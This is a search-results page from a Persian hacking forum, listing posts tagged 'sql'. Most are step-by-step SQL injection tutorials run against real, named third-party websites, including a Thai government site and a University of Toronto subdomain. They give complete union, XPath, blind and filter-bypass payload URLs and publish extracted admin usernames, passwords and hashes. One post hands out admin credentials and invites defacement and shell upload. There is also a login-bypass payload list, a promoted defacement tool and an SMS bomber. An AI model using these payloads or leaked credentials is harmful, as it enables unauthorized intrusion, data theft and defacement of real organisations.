discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'sql'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

39 نتیجه پیدا شد

  1. سلام دوستان داخل این تاپیک می خوام بهتون نسخه 1.2 ابزار ساخت صفحه دیفیس رو معرفی کنم می تونید از این لینک نسخه 1.1 رو مشاهده کنید دوستان خیلی سر عنوان مشکل داشتن برای همین ما اسم ابزار رو گزاشتیم defaker که مخففه deface maker هستش نسخه بعدی این ابزار 2.3 خواهد بود که تغییرات زیادی خواهد داشت ( ساخت دیفیس {برای صفحه وب , برای سیستم عامل ها} ابزار های تست نفوذ وب باگ های { sql , xss , . . . } قابلیت ساخت و کنترل ویروس برای سیستم عامل های مختلف و . . . ) نمایه از ابزار ( نسخه 1.2 ) امیدوارم براتون کار آمد باشه تا فراموش نکردم باید تشکر کنم از دوست خوبمون @SHIWPTS13 که خیلی به من داخل ساخت این ابزار کمک کرد و کمک می کنند در همین تاپیک باید نوید ابزار SMSbomber رو بهتون بدم در دو پلتفرم وب ( می تونید لوکال هاست بیارید بالا یا از سایت استفاده کنید ) سیستم عامل ها ( گرافیکی ) به امید خدا به زودی سعی می کنیم این ابزار ها رو براتون قرار بدیم تا تاپیک های بعدی خدانگهدار در پناه حق 👋 defaker.rar نویسنده : Z🙂D
  2. سلام دوستان من یک سایت رو زدم ولی هر کاری می کنم تو زون اچ ایرانی ثبت نمیشه ارور 500 سرور میده یوزر پسورد رو میزارم می تونید برید به اسم خودتون دیفیس کنید و ثبتش کنید شاید سایت منو بلاک کرده باشه در هر صورت ادرس سایت : https://www.sukhothai1.go.th یوزر : Zed پسورد : HackerZed ادرس پیج ادمین :https://www.sukhothai1.go.th/_admin/ می تونید شل اپ کنید مث دیفیس کنید یا دیفیس هاتون رو تست کنید
  3. با سلام خدمت دوستان عزیز در این ویدئو آسیب پذیری Sql injection رو کار کردیم و بر خلاف ویدئو های قبل به همراه توضیح آموزش دادیم که مفاهیم رو بهتر یاد بگیرید. لایک، کامنت سابسکرایب فراموش نشه. موفق و پیروز باشید.
  4. nonamee

    Html,Css

    𝕚𝕟 𝕥𝕙𝕖 𝕟𝕒𝕞𝕖 𝕠𝕗 𝕘𝕠𝕕 با سلام و احترام خدمت تیم محترم 𝓰𝓾𝓪𝓻𝓭𝓲𝓻𝓪𝓷 در این تاپیک آموزش Html,Css را قرار خواهم داد ودر در دوره های بعدی با html5,css3 و جی کوئری ، بوت استرپ 4 ، پایگاه داده mysql و زبان برنامه نویسی php آشنا خواهید شد پس لطفا در تاپیک ها اسپم وارد نکنید و برای ادامه آموزش ها تاپیک ها را بپسندید
  5. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
  6. با سلام خدمت دوستان عزیز . امروز براتون ویدئویی رو قرار دادم در رابطه با اسیب پذیری ‌Xpath Injection اگه صدا مشکل داره توی خود یوتیوب مشاهده کنید . ( در ضمن به دلایل امنیتی صدا رو تغییر دادم ) همچنین قبلا هم یک پست اموزشی گزاشتم که میتونید از اون هم استفاده کنید :‌ دکمه تشکر کنار تاپیک فراموش نشه . موفق و پیروز باشید .
  7. ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : https://www.nitrogenium.co.in/features-product.php?id=45 با قرار دادن ' آسیب پذیری مشخص خواهد شد https://www.nitrogenium.co.in/features-product.php?id=45' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور https://www.nitrogenium.co.in/features-product.php?id=45 order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group https://www.nitrogenium.co.in/features-product.php?id=45 group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم https://www.nitrogenium.co.in/features-product.php?id=45' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت https://www.nitrogenium.co.in/features-product.php?id=45' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل https://www.nitrogenium.co.in/features-product.php?id=45' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
  8. nonamee

    مسدود شدن اکانت

    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران دوستانی که چندین اکانت میسازن و پست های خودشون رو میپسندند باید این رو هم در نظر داشته باشید که مدیران سایت چک خواهند کرد و اکانت شما مسدود خواهد شد !
  9. ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران تارگت اول برای آموزش -> شما برای پی بردن به وجود باگ SQL از چندین روش میتونید استفاده کنید روش اول بعد از عدد یا حرف میتونید هر یک از این علامت هارو قرار بدین ' یا '' یا \ بعد از قرار دادن هر یک از این علامت ها اگر هر گونه تغییر در سایت شدین احتمال زیاد سایت حاوی باگ هستش حالا عملیات برای سایت های مختلف فرق خواهد کرد که با چه زبانی نوشته شده ما فرض میکنیم با php نوشته شده برای پیدا کردن تارگت شما باید دورک نویسی را بلد باشید , اگر دورک نویسی بلد نباشید احتمال زیاد از تارگت هم خبری نیست من لیستی از دورک هارو واستون قرار میدم DORK.txtهر یک از دورک هارو در گوگل search کنید یادتون باشه اول دورک :inurl قرار بدید باگ SQLinjection نکات زیادی داره که سعی میکنم همه ی نکات را تقریبا خدمتتون عرض کنم ولی فعلا شما باید با نحوه ی کار آشنا بشید خب بریم سراغ تارگت اول http://musculoskeletalsociety.in/page.php?id=5 شما بعد از قرار دادن ' متوجه خواهید شد که سایت حاوی باگ است به همین ترتیب شما میتونید خیلی راحت version و تعداد ستون های سایت رو دربیارید http://musculoskeletalsociety.in/page.php?id=5 order by 99999-- 99999 که مشاهده میکنید یک عدد بزرگ هستش که شما به دلخواه میتونید وارد کنید این بدان معناست که ما با سایت صحبت میکنیم که آیا انقدر تعداد ستون دارد یا خیر ؟ اگر بعد از قرار دادن این عدد بزرگ سایت به طور کامل load شد این بدان معناست که سایت در گفتن حرف صحیح دریغ میکند 😁 پس باید بایپس آن را انجام دهیم بایپس این مورد به این شکل هستش http://musculoskeletalsociety.in/page.php?id=-5 order by 99999--+ در این حالت سایت دیگر load نمی شود چون دیگر اینقدر ستون ندارد ما تا جایی عدد 9999 را کم میکنیم که تا صفحه load شود که این بدان معناست تعداد ستون ها 5 عدد است http://musculoskeletalsociety.in/page.php?id=-5 order by 5--+ حال با دستور UNION SELECT 1,2,3,4,5 ستون هارو مشخص میکنیم http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,3,4,5--+ بعد از انجام مراحل بالا ستون ها مشخص میشود در صفحه عدد 2 و 3 مشخص شده است ما باید سعی کنیم عددی را انتخاب کنیم که از لحاظ سایز زیادی بزرگ نباشد برای مثال در اینجا عدد 2 دارای سایز بزرگتری نسبت به 3 هستش پس ما شروع به سوال پرسیدن از عدد 3 خواهیم کرد حال سوال پیش میاید چرا 2 را انتخاب نکنیم ؟ چون در استخراج اطلاعات مهم سایت مثلا user va pass به صورت حروف بزرگ نمایش داده میشود که ممکن است این حروف به صورت کوچک وارد سیستم شده اند برای فهمیدن version سایت کافی است شما ()version را به جای عدد 3 قرار دهید این نکته هم خدمتتون عرض کنم اگر جایی با گذاشتن ()version چیزی نمیایش داده نشد آن را بایپس کنید بدین صورت version@@ http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,version(),4,5--+ حال به سراغ بیرون کشید data base سایت خواهیم رفت بدین صورت با دستور http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,group_concat(table_name,0x3c62723e),4,5+from+information_schema.tables+where+table_schema=database()--+ اگر مشاهده کنید admin یک base مهم برای کار ماست آن را یاد داشت میکنیم و به صورت hex شده هم در میاوریم اگر نمیدونید چطور به صورت hex دربیارید چون باید به زبان سایت admin را تبدیل کنید یک برنامه قرار میدم برای راحتی کارتون CharConversion.rarپسورد ---> guardiran.org admin = 0x61646d696e اینو یادتون باشه حتما قبل 61646d696e ---> 0x قرار دهید دستور بدین صورت است http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(column_name,0x3c62723e),4,5+from+information_schema.columns+where+table_name=0x61646d696e--+ بعد از مشخص شدن table های مهم آن ها را در دستور زیر وارد کنید group_concat(user,0x3a,password)+from+ Hex kardim http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(user_id,0x3a,password,0x3c62723e),4,5+from+admin--+ به همین راحتی username : admin password : 25a41cec631264f04815eda23dc6edd9 password : vizag@123 سعی کردم تارگتی رو انتخاب کنم که به راحتی بتونید یاد بگیرید دستورات رو نکته : دستوری رو میتونم یادتون بدم که در خیلی موارد جواب میده و اصلا نیاز نیست زمان زیادی برای پیدا کردن database یا table صرف کنید شما فقط کافی در قسمت ستون آسیب پذیر این دستور رو وارد کنید (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a) به همین راحتی تمام جزئیات مشخص خواهد شد تارگت شماره ی 2 ----------> http://www.belbana.com شما خیلی راحت میتونید با دورک نویسی صفحه ای رو پیدا کنید برای وارد کرد دستورات مثلا در گوگل بدین صورت search میکنید site:"http://www.belbana.com" inurl:"id=" http://www.belbana.com/our-products-detail.php?id=1 فرضا این صفحه رو انتخاب کردیم و دستورات را وارد میکنیم با وارد کردن ' متوجه میشیم که سایت دارای تغییر است و Error میدهد پس سایت باگ SQLinjection دارد حال دستورات را وارد میکنیم http://www.belbana.com/our-products-detail.php?id=1 order by 999999-- بعد از آن فهمیدیم که تعداد ستون های سایت 7 تا است بدین طریق عمل میکنیم http://www.belbana.com/our-products-detail.php?id=1%20union%20select%201,2,3,4,5,6,7-- ولی بعد از وارد کردن این دستورات یک Error معروف به میدهد The used SELECT statements have a different number of columns زمانی که با این Error مواجع شدید باید از بایپس استفاده کنید اگر بایپس هم جوابگو نداد باید از متد Xpath injection استفاده کنید متد xpath injection برای به دست آوردن version در این متد شما باید بدین طریق عمل کنید با این دستور +and+extractvalue(rand(),concat(0x7e,version()))-- or +and+updatexml(null,concat(0x3a,version()),null)-- بعد از وارد کردن http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,version()))-- version مشخص میشود XPATH syntax error: '~5.5.62-38.14-log' به همین راحتی حالا باتوجه به دستورات xpath injection برای به دست آوردن data base سایت عمل میکنیم بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))-- که با زیاد کردن عدد 0 میتونید database رامشخص کنید ولی برای راحتی کار شما یک متد محدود سازی شده قرار میدم که میتونید استفاده کنید که زمانتون از دست نره بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- حال دستورات را وارد کنید بدین طریق http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- مشاهده میکنید که با خوش شانسی اول admin پدیدار میشود بسیار خب حال برای فهمیدن چه چیزی درون ادمین است از این روش استفاده میکنیم فقط قبلش باید admin رو به صورت hex شده دربیارید admin = 0x61646d696e +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=name table hex masalan admin+limit+0,1)))-- بسیار خب حالا دستور بالا را وارد میکنیم www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1)))-- بسیار خب حالا عدد صفر را به ترتیب زیاد کنید مشاهده میکنید که XPATH syntax error: '~id' XPATH syntax error: '~login' XPATH syntax error: '~paswoord' نمایش داده میشود انقدر عدد را افزایش میدید که دیگر چیزی نمایش داده نشود حالا با دستور زیاد اطلاعات رو بیرون میکشیم +and+extractvalue(rand(),concat(0x7e,(select+concat(login,0x7e,paswoord)+from+admin+limit+0,1)))-- XPATH syntax error: '~belbana~3AMGz4dfNRUteaZfbeng' سعی میکنم در روز های آینده تارگت و آموزش رو باهم قرار بدم همراه با بایپس های خاص امیدوارم موفید واقع شده باشه با تشکر
  10. MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  11. برای تمرین باگ Sql Injection و برای اینکه کلی وقتتون جهت پیدا کردن باگ آسیب پذیر گرفته نشه در هر بخش چندین تارگت برای تمرین و نفوذ و هک سایت با باگ Sql Injection ( Hacking Web Application Sql Injection ) را برای شما قرار میدم . اسپم ندین و سوالات رو تنها در این بخش مطرح کنید . مجددا تکرار می کنم از قرار دادن سایتهای ایرانی خودداری فرمایید www.c2-europe.eu/news-full.php?id=1049 www.c2-deutschland.de/news-full.php?id=287 www.p5n.net/mtl/news-full.php?id=14 http://www.formsintl.com/news-full.php?id=14 موفق باشین
  12. imanMN

    تاپیک کمبو لیست(combo list)

    دوستان عزیز در این تاپیک تمام کمبو لیست(combo list) های ایرانی و خارجی رو خودتون قرار بدید. قوانین 1-لیستتون رو فقط پیوست کنید 2-از اسپم خودداری کنید 3-نوع کمبو رو هم نام ببیرید 4-در صورت گذاشتن رمز رمز باید Guardiran باشد موفق باشید!!!
  13. MR.MSA

    sql injection ( انلاین )

    با سلام خدمت دوستان عزیز در این تاپیک هر کس تمایل دارد sql injection رو یاد بگیرد (به صورت انلاین ) که خودم آموزش می دهم اینجا اعلام کند . توی تلگرام آموزش می دهم . ابتدا باید این جا اعلام کنید تا برای شما پیام ارسال کنم . فقط کسانی که ثبت نام کردن می توانند در اموزش شرکت کنند و دیگر یه عضو خوب باشه تو انجمن ، فعال و گذاشتن پست و... امیدوارم لذت ببرید . 😅
  14. MR.MSA

    دانشگاه Toronto

    با سلام خدمت دوستان عزیز از طریق یکی از ساب دامنه ها به دیتابیسی که در اون یوز و پسورد ادمین هست دسترسی گرفته شد . فکر کنم پسورد هش sha256 هست . در یکی دیگر از تیبل ها یوزر های دیگر بود ولی این به احتمال زیاد برای ادمین هست . https://domapp.utoronto.ca/ccdir/displaymember.php?id=-74+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(users_name,0x3a,password,0x3a,email),12+from+lime_forms.lime_users-- اولین دانشگاه در کنادا و ۲۵ دانشگاه در جهان . با رنک الکسای خوب .
  15. با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . Xpath injection کاربرد : 1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید . 2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید . 3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد . 4. و..... -------------- -------------- -------------- روش استفاده از متد xpath اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و .... اگر مشکل حل نشد به سراغ این متد میاید . آموزش متد xpath : بدست اوردن ورژن : …..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))-- 0x7e به معنای علامت (~) است . version() به معنای ورژن سایت است. در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  16. با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌) 99 ‌< true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99 = load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  17. MR.MSA

    Download Keyword

    برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
  18. با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
  19. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
  20. با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم . متد separator‌ : در زمان مرتب سازی تیبل ها ، ستون ها و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید : ..........(group_concat(table_name,0x3c62723e...... حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت : .......( group_concat((table_name)separator 0x3c62723e...... زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد . ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید .
  21. MR.MSA

    نکته مهم در متد join

    با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و 